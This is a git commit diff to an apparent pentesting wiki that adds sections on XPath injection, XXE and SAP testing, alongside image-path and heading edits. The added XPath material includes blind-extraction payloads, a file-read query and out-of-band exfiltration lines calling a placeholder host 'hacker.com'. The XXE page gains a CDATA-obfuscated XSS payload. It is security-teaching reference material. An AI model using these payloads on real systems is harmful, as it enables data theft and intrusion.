GitBook: [master] 7 pages and 14 assets modified

This commit is contained in:
CPol 2021-06-06 18:35:32 +00:00 committed by gitbook-bot
parent 853a3c8146
commit 452bc1d9fc
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
17 changed files with 96 additions and 17 deletions

View file

Before

Width:  |  Height:  |  Size: 341 KiB

After

Width:  |  Height:  |  Size: 341 KiB

View file

Before

Width:  |  Height:  |  Size: 341 KiB

After

Width:  |  Height:  |  Size: 341 KiB

View file

Before

Width:  |  Height:  |  Size: 10 KiB

After

Width:  |  Height:  |  Size: 10 KiB

View file

Before

Width:  |  Height:  |  Size: 10 KiB

After

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 18 KiB

After

Width:  |  Height:  |  Size: 38 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.8 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 2.8 KiB

After

Width:  |  Height:  |  Size: 35 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 66 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 35 KiB

View file

@ -134,7 +134,7 @@ Some interesting attributes:
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) \(among others\):
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
![](../../../.gitbook/assets/image%20%28507%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28507%29%20%281%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28512%29.png)

View file

@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%281%29.png)
### USB Detective

View file

@ -601,7 +601,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%281%29.png)
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%281%29.png)
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:

View file

@ -506,6 +506,10 @@ curl http://rancher-metadata/<version>/<path>
The difference between a blind SSRF and a not blind one is that in the blind you cannot see the response of the SSRF request. Then, it is more difficult to exploit because you will be able to exploit only well-known vulnerabilities.
### Time based SSRF
**Checking the time** of the responses from the server it might be **possible to know if a resource exists or not** \(maybe it takes more time accessing an existing resource than accessing one that doesn't exist\)
## Detect SSRF
You can use [https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff) to create an HTTP server that will respond correctly to a lot of different requests \(GET, POST, PTU, DELETE, JSON, TXT, GIF, MP3...\).

View file

@ -101,7 +101,7 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
## Example
```text
```markup
<?xml version="1.0" encoding="ISO-8859-1"?>
<data>
<user>
@ -122,6 +122,8 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
</data>
```
### Access the information
```text
All names - [pepe, mark, fino]
name
@ -149,6 +151,43 @@ string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
```
### Identify & stealing the schema
```python
and count(/*) = 1 #root
and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
and count(/*[1]/*[1]/*) = 1 #count(a) = 1 (b)
and count(/*[1]/*[1]/*[1]/*) = 0 #count(b) = 0
and count(/*[1]/*[2]/*) = 3 #count(c) = 3 (d,e,f)
and count(/*[1]/*[2]/*[1]/*) = 0 #count(d) = 0
and count(/*[1]/*[2]/*[2]/*) = 0 #count(e) = 0
and count(/*[1]/*[2]/*[3]/*) = 1 #count(f) = 1 (g)
and count(/*[1]/*[2]/*[3]/[1]*) = 0 #count(g) = 0
#The previous solutions are the representation of a schema like the following
#(at this stage we don't know the name of the tags, but jus the schema)
<root>
<a>
<b></b>
</a>
<c>
<d></d>
<e></e>
<f>
<h></h>
</f>
</c>
</root>
and name(/*[1]) = "root" #Confirm the name of the first tag is "root"
and substring(name(/*[1]/*[1]),1,1) = "a" #First char of name of tag `<a>` is "a"
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of tag `<b>`is codepoint 105 ("i") (https://codepoints.net/)
#Stealing the schema via OOB
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
```
## Authentication Bypass
### **Example of queries:**
@ -226,19 +265,20 @@ The output contains strings and the user can manipulate the values to search:
## Blind Explotation
### **Get length of a value and extract it by comparisons:**
### **Get length of a value and extract it by comparisons:**
```text
```bash
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a"
Other way
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value
```
### **Example:**
### **Python Example**
```text
```python
import requests, string
flag = ""
@ -259,6 +299,31 @@ for i in range(1, l + 1): #print("[i] Looking for char number " + str(i))
break
```
### Read file
```python
(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127
```
## OOB Exploitation
```python
doc(concat("http://hacker.com/oob/", RESULTS))
doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))
#Instead of doc() you can use the function doc-available
doc-available(concat("http://hacker.com/oob/", RESULTS))
#the doc available will respond true or false depending if the doc exists,
#user not(doc-available(...)) to invert the result if you need to
```
### Automatic tool
{% embed url="https://xcat.readthedocs.io/" %}
## References
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection)

View file

@ -314,6 +314,12 @@ Once the server has downloaded your file, you need to find its location by brows
Writing files in a temporary directory can help to e**scalate another vulnerability that involves a path traversal** \(such as local file include, template injection, XSLT RCE, deserialization, etc\).
{% endhint %}
### XSS
```markup
<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>
```
### DoS
#### Billion Laugh Attack
@ -343,6 +349,10 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
#### Quadratic Blowup Attack
![](../.gitbook/assets/image%20%28479%29.png)
## Hidden XXE Surfaces
### XInclude

View file

@ -1,6 +1,6 @@
# Pentesting SAP
### Introduction about SAP
## Introduction about SAP
SAP stands for Systems Applications and Products in Data Processing. SAP, by definition, is also the name of the ERP \(Enterprise Resource Planning\) software as well as the name of the company.
SAP system consists of a number of fully integrated modules, which covers virtually every aspect of business management.
@ -15,7 +15,7 @@ Youd be surprised if you knew how often these **passwords arent changed in
Try to get access to the shell of any server using username &lt;SID&gt;adm.
Bruteforcing can help, whoever there can be Account Lockout mechanism.
### Discovery
## Discovery
> Next section is mostly from [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) from user shipcod3!
@ -63,7 +63,7 @@ msf auxiliary(sap_service_discovery) > run
[*] 192.168.96.101: - [SAP] Beginning service Discovery '192.168.96.101'
```
#### Testing the Thick Client / SAP GUI
### Testing the Thick Client / SAP GUI
Here is the command to connect to SAP GUI
`sapgui <sap server hostname> <system number>`
@ -126,7 +126,7 @@ BWDEVELOPER:Down1oad:001
* Check if you can execute system commands / run scripts in the client.
* Check if you can do XSS on BAPI Explorer
### Testing the web interface
## Testing the web interface
* Crawl the URLs \(see discovery phase\).
* Fuzz the URLs like in the discovery phase. Here is what [http://SAP:50000/index.html](http://sap:50000/index.html) looks like:
@ -176,7 +176,7 @@ This XML file does not appear to have any style information associated with it.
</SOAP-ENV:Envelope>
```
### Attack!
## Attack!
* Check if it runs on old servers or technologies like Windows 2000.
* Plan the possible exploits / attacks, there are a lot of Metasploit modules for SAP discovery \(auxiliary modules\) and exploits:
@ -243,7 +243,7 @@ Matching Modules
exploit/windows/http/sapdb_webtools 2007-07-05 great SAP DB 7.4 WebTools Buffer Overflow
exploit/windows/lpd/saplpd 2008-02-04 good SAP SAPLPD 6.28 Buffer Overflow
exploit/windows/misc/sap_2005_license 2009-08-01 great SAP Business One License Manager 2005 Buffer Overflow
exploit/windows/misc/sap_netweaver_dispatcher 2012-05-08 normal SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow
exploit/windows/misc/sap_netweaver_dispatcher 2012-05-08 normal SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow
```
* Try to use some known exploits \(check out Exploit-DB\) or attacks like the old but goodie “SAP ConfigServlet Remote Code Execution” in the SAP Portal:
@ -278,14 +278,14 @@ bizploit/plugins> back
bizploit> start
```
### Other Useful Tools for Testing
## Other Useful Tools for Testing
* [PowerSAP](https://github.com/airbus-seclab/powersap) - Powershell tool to assess sap security
* [Burp Suite](https://portswigger.net/burp) - a must have for directory fuzzing and web security assessments
* [pysap](https://github.com/SecureAuthCorp/pysap) - Python library to craft SAP network protocol packets
* [https://github.com/gelim/nmap-erpscan](https://github.com/gelim/nmap-erpscan) - Help nmap to detect SAP/ERP
### References
## References
* [SAP Penetration Testing Using Metasploit](http://information.rapid7.com/rs/rapid7/images/SAP%20Penetration%20Testing%20Using%20Metasploit%20Final.pdf)
* [https://github.com/davehardy20/SAP-Stuff](https://github.com/davehardy20/SAP-Stuff) - a script to semi-automate Bizploit